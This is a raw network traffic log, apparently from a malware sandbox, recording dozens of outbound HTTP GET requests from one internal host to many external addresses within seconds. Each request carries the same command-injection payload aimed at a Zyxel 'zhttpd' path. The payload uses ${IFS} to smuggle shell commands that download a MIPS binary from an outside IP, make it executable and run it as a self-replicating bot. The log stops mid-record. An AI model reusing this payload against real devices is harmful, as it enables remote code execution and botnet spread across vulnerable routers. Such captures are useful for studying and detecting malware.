                                            Feb 2, 2024 06:21:07.528523922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3109192.168.2.155788493.82.174.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.528542042 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3110192.168.2.1548202109.105.152.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.528593063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3111192.168.2.1550200111.44.225.133443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.528611898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3112192.168.2.1535892166.58.64.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.528675079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3113192.168.2.1538060200.137.144.88443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.528696060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3114192.168.2.1558538218.229.48.57443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.528732061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3115192.168.2.1557356138.2.111.36443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.528772116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3116192.168.2.1558786176.106.102.212443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.528806925 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3117192.168.2.1541534210.15.43.211443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.528841972 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3118192.168.2.1552508168.104.201.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.528891087 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3119192.168.2.153447227.187.162.113443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.528928041 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3120192.168.2.153859278.175.207.168443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.528953075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3121192.168.2.1555138193.227.230.164443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.528983116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3122192.168.2.153357699.237.18.251443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.529021978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3123192.168.2.1532806107.232.134.18443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.529059887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3124192.168.2.154319641.127.88.134443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.529068947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3125192.168.2.1547284112.55.100.228443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.529560089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3126192.168.2.1545868156.92.165.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.531009912 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3127192.168.2.153734031.205.202.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.531219959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3128192.168.2.1560774193.136.112.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.531383038 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3129192.168.2.154249867.35.11.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:07.532532930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3130192.168.2.155289093.198.46.148443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.542002916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3131192.168.2.1536256153.120.237.199443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.542035103 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3132192.168.2.155159457.220.184.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.542078018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3133192.168.2.1546048111.39.10.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.542104006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3134192.168.2.1536400158.113.81.156443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.542171955 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3135192.168.2.1540636173.170.151.159443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.542213917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3136192.168.2.153298417.108.211.136443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.542270899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3137192.168.2.1550310198.235.186.0443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.542306900 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3138192.168.2.1553168205.104.161.106443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.542347908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3139192.168.2.1540794201.236.62.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.542411089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3140192.168.2.154470638.228.22.1443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.542443991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3141192.168.2.1554064133.21.38.178443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.542486906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3142192.168.2.1557092150.114.186.127443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.542545080 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3143192.168.2.15458521.129.197.6443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.542577028 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3144192.168.2.1546800116.125.205.158443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.542619944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3145192.168.2.155637466.237.29.86443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.542670965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3146192.168.2.1557352191.239.110.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.542715073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3147192.168.2.1553352188.81.4.209443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.542723894 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3148192.168.2.155210883.7.48.253443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.542777061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3149192.168.2.1546564120.152.13.58443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.542799950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3150192.168.2.1534044137.81.70.213443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.542831898 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3151192.168.2.153399462.72.80.82443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.542882919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3152192.168.2.155866466.13.133.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.542922020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3153192.168.2.1559818122.84.207.144443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.542943001 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3154192.168.2.155636280.150.107.187443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.542975903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3155192.168.2.1533788200.12.148.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.543035030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3156192.168.2.1542128177.89.127.60443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.543080091 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3157192.168.2.154364827.107.34.89443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.543127060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3158192.168.2.1560936177.95.100.192443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.543152094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3159192.168.2.1548036168.119.151.166443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.543198109 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3160192.168.2.1547724194.154.63.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.543242931 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3161192.168.2.1550272117.101.118.202443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.543284893 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3162192.168.2.1547938131.166.159.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.543322086 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3163192.168.2.153606688.25.160.215443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.543349981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3164192.168.2.154413694.128.0.54443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.543402910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3165192.168.2.1548270151.234.81.223443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.543435097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3166192.168.2.155828243.210.76.4443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.543453932 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3167192.168.2.1560768120.72.145.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.543493986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3168192.168.2.155702212.213.247.232443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.543531895 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3169192.168.2.1546732182.16.167.19443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.543564081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3170192.168.2.1536870203.239.233.227443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.543611050 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3171192.168.2.154770441.153.191.217443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:08.543646097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            3172192.168.2.1538228203.111.4.171443
                                            TimestampBytes transferredDirectionData
